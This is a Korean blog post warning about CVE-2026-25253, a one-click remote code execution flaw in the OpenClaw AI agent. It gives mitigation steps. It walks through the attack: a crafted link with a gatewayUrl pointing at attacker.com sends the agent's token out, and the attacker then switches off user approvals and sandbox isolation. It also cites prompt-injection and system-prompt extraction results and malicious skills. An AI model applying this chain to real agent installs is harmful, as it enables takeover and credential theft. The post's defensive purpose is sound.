안녕하세요, 여러분! 😊
요즘 AI 에이전트 열풍이 정말 대단하죠? 특히 OpenClaw(이전 ClawdBot, Moltbot)가 GitHub 스타 10만 개를 넘기며 엄청난 인기를 끌고 있는데요. 하지만 이 글을 읽으시는 분들이라면 반드시 알아야 할 치명적인 보안 문제가 발생했습니다. 😱
막 설치하려던 분이나, 이미 사용 중이신 분들 모두 꼭 이 글을 끝까지 읽어주세요!
📢 도대체 무슨 일이 일어난 걸까요?
2026년 2월 초, 보안 연구팀에서 OpenClaw에 CVSS 점수 8.8의 초고위험 보안 취약점을 발견했습니다. CVE-2026-25253로 등록된 이 취약점은 단순히 악성 링크를 한 번만 클릭해도 여러분의 컴퓨터 전체를 해커가 장악할 수 있는 무시무시한 문제인데요.
더 충격적인 사실은? 🔥
- 보안 분석에서 100점 만점에 겨우 2점 획득
- 프롬프트 인젝션 공격 성공률 91%
- 데이터 추출률 84%
- 시스템 프롬프트가 첫 시도에 완전 노출
"로컬에서만 실행하니까 안전하겠지?"라고 생각하셨다면 오산입니다! localhost로만 실행해도 이 공격은 여전히 유효하거든요. 😰
🎯 OpenClaw가 뭐길래 이렇게 위험한가요?

간단히 설명드리자면, OpenClaw는 로컬 컴퓨터에서 실행되는 AI 개인 비서예요. WhatsApp, Telegram, Discord 같은 메신저에서 명령을 내리면 다음과 같은 작업을 대신 수행해줍니다:
✅ 파일 관리 및 편집 ✅ 쉘 명령어 실행 ✅ 웹 검색 및 자동화 ✅ 여러 AI 모델 동시 사용 (Claude, GPT, Gemini) ✅ 캘린더, 스마트홈 기기 제어
강력한 만큼 여러분의 컴퓨터에 광범위한 권한을 가지고 있죠. 그래서 보안 문제가 발생하면 피해 규모가 엄청날 수밖에 없어요.
💀 CVE-2026-25253: 원클릭 RCE 공격의 무서운 진실
공격은 이렇게 진행됩니다
보안 연구원 Mav Levin이 공개한 공격 과정은 정말 소름끼칠 정도로 간단합니다:
1단계 - 미끼 던지기 🎣 공격자가 조작된 링크를 보냅니다. 예를 들면 http://victim_openclaw.com?gatewayUrl=ws://attacker.com:8080 이런 식이죠.
2단계 - 토큰 탈취 (단 몇 밀리초!) ⚡ 피해자가 링크를 클릭하는 순간, OpenClaw의 인증 토큰이 공격자 서버로 자동 전송됩니다. OpenClaw가 gatewayUrl 파라미터를 아무 검증 없이 신뢰하기 때문이에요.
3단계 - WebSocket 하이재킹 🕸️ 공격자는 훔친 토큰으로 피해자의 localhost OpenClaw에 연결합니다. 왜 가능하냐고요? OpenClaw 서버가 WebSocket의 origin 헤더를 검증하지 않기 때문이죠.
4단계 - 샌드박스 무력화 🔓 operator.admin과 operator.approvals 권한을 악용해서:
- 사용자 승인 절차를 꺼버림 (exec.approvals.set → off)
- Docker 컨테이너 격리를 해제 (tools.exec.host → gateway)
5단계 - 완전한 시스템 장악 💥 이제 공격자는 여러분의 컴퓨터에서 마음대로 명령을 실행할 수 있습니다. API 키, 비밀번호, 개인 파일... 모든 것이 위험에 노출되는 거죠.
실제 피해 사례는?
- 2만 1천 개 이상의 OpenClaw 인스턴스가 인터넷에 공개 노출됨
- 그 중 30%가 알리바바 클라우드 인프라에서 실행 중
- 기본 포트 TCP/18789로 실행되는 많은 설치본이 충분히 보호되지 않은 상태
- ClawHub에 악성 스킬 14개가 3일간 업로드되어 사용자 시스템에 악성코드 설치 시도
🛡️ 지금 당장 해야 할 5가지 보안 조치
OpenClaw를 사용 중이거나 설치를 고려 중이라면 즉시 다음 조치를 취하세요!
1️⃣ 최신 버전으로 업데이트 (최우선!)
npm install -g openclaw@latest
# 또는
pnpm add -g openclaw@latest
v2026.1.29 이상 버전으로 업데이트하세요. 이 버전에서 CVE-2026-25253이 패치되었습니다.
2️⃣ 게이트웨이 토큰 재생성
기존 인증 토큰은 이미 유출되었을 가능성이 있어요. 새로운 authToken을 생성하세요.
3️⃣ 연결된 API 키 모두 교체
OpenClaw에 연결했던 모든 서비스의 API 키를 즉시 교체하세요:
- Claude API 키
- OpenAI API 키
- Google Gemini API 키
- 기타 연동 서비스 인증 정보
4️⃣ 샌드박스 필수 활성화
OpenClaw의 샌드박스는 기본적으로 꺼져 있습니다! 😱 반드시 켜야 해요:
# OpenClaw 보안 문서 확인
openclaw security check
5️⃣ 로그 점검 및 모니터링
- 인증 로그에서 의심스러운 WebSocket 연결 확인
- 예상치 못한 토큰 사용 흔적 찾기
- 비정상적인 명령 실행 기록 검토
🔍 전문가들의 경고: "절대 안심하면 안 됩니다"
테슬라 전 AI 디렉터 Andrej Karpathy의 평가
"OpenClaw는 최근 본 것 중 가장 놀라운 SF 같은 급성장이지만, 동시에 대규모 보안 악몽이다."
구글 클라우드 보안 부사장 Heather Adkins의 강력 경고
"OpenClaw를 실행해서는 안 된다. 외부에서 실시간으로 스킬을 내려받는 구조상, 서버가 해킹당하면 수만 대의 사용자 컴퓨터가 동시에 장악될 수 있다."
OpenClaw 창립자 Peter Steinberger의 인정
"프롬프트 인젝션은 여전히 업계 전반의 미해결 문제다. 강력한 모델을 사용하고 보안 모범 사례를 숙지하는 것이 중요하다."
📊 추가로 발견된 보안 문제들
CVE-2026-25253만이 문제가 아니에요. 연쇄적으로 터져나온 보안 이슈들을 살펴볼까요?
🎭 ClawHub 악성 스킬 유포 사건
- 1월 27일~29일 사이 14개의 악성 스킬 업로드
- 암호화폐 거래 도구로 위장한 악성코드
- 사용자 시스템에 백도어 설치 시도
🤖 몰트북(Moltbook) 보안 우려
AI 에이전트만 활동하는 소셜 미디어 '몰트북'도 새로운 보안 위협으로 지적받고 있어요. 에이전트들이 사용자 데이터를 공유하고, 심지어 "AI 반란"을 논의하는 등 예측 불가능한 행동을 보이고 있죠.
📉 ZeroLeaks 보안 분석 결과
독립 개발자 Lucas Valbuena의 테스트 결과:
- 전체 보안 점수: 2/100점
- 시스템 프롬프트 완전 노출
- 내부 도구 구성 및 메모리 파일 접근 가능
- 평문으로 저장된 자격증명 발견
💡 안전하게 AI 에이전트 사용하는 법
그렇다고 AI 에이전트를 완전히 포기할 순 없잖아요? 안전하게 사용하는 방법을 알려드릴게요! 😊
✅ 실천 가능한 보안 팁
1. 격리된 환경에서 실행하세요
- 개발용 노트북 대신 별도 컴퓨터나 VM 사용
- 중요한 데이터가 없는 환경에서만 실행
- 24시간 돌릴 전용 서버 마련 (중고 맥미니 등)
2. 최소 권한 원칙 적용
- 꼭 필요한 권한만 부여하세요
- 파일 접근 범위를 최소화
- 실험용 계정으로 먼저 테스트
3. Tailnet 같은 VPN으로 네트워크 격리
- 공용 네트워크에 relay 포트 노출 금지
- Tailscale 등으로 안전한 터널 구성
- localhost 바인딩만으로는 부족해요!
4. 정기적인 보안 점검
# 정기적으로 실행하세요
openclaw health
openclaw gateway status
5. 의심스러운 스킬은 절대 설치 금지
- ClawHub에서 스킬 다운로드 전 리뷰 확인
- 소스 코드 검토 (가능한 경우)
- 공식 또는 검증된 개발자의 스킬만 사용
🤔 그럼 OpenClaw를 아예 쓰지 말아야 할까요?
이건 정말 어려운 질문이에요. OpenClaw는 분명 혁신적이고 강력한 도구예요. 하지만 현재로서는 보안이 충분히 성숙하지 않은 것도 사실입니다.
사용을 고려해볼 수 있는 경우
- 보안 지식이 충분한 개발자
- 격리된 테스트 환경에서만 사용
- 중요한 데이터를 다루지 않는 업무
- 최신 버전을 항상 유지할 수 있는 환경
사용을 피해야 하는 경우
- 회사 업무용 컴퓨터
- 개인정보나 금융 정보가 있는 시스템
- 보안 설정에 자신이 없는 경우
- 24시간 모니터링이 불가능한 환경
🔮 AI 에이전트 시대의 보안, 어디로 가야 할까?
OpenClaw 사태는 AI 에이전트 시대의 보안 과제를 적나라하게 보여줍니다. 편리함과 보안 사이의 균형을 어떻게 맞출 것인가가 앞으로의 핵심 과제가 될 거예요.
업계가 해결해야 할 과제
- 프롬프트 인젝션 방어 표준 확립
- 제로 트러스트 아키텍처 도입
- 스킬 마켓플레이스 보안 검증 체계
- 샌드박스 기본 활성화
- 정기적인 보안 감사 의무화
📌 참고 자료
- OpenClaw 공식 보안 권고문
- CVE-2026-25253 상세 분석 (NVD, DepthFirst)
- The Hacker News 보안 리포트
- 국내외 IT 보안 뉴스
'정보의기록' 카테고리의 다른 글
| 구글 Gemini 3.5 2026년 2월 출시? (0) | 2026.02.05 |
|---|---|
| Claude Sonnet 5 오늘 출시? 성능·가격 완벽 분석 (1) | 2026.02.03 |
| OpenClaw 가이드: 개인 AI 비서 설치부터 활용까지 (0) | 2026.02.02 |
| 2026년 연말정산 간소화 서비스 완벽 가이드 | 달라지는 점 총정리 (홈택스 이용법) (1) | 2026.01.19 |
| 2026년 자동차세 연납 신청 완벽 가이드 | 5% 할인 받는 방법 총정리 (0) | 2026.01.16 |